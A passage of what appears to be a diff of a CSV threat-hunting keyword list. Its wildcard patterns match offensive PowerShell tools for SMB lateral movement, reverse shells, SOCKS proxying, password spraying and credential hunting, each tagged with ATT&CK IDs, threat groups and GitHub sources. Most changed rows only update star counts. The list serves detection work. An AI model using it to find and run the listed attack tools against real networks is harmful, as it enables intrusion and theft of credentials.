AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-SMBExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SMBExec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-SMBNegotiate -ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBNegotiate -ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SmbObey *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbObey.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SMBRemoting.ps1*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Invoke-SMBRemoting-main*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" -"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-SocksProxy *","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" -"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SQLAudit*","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - 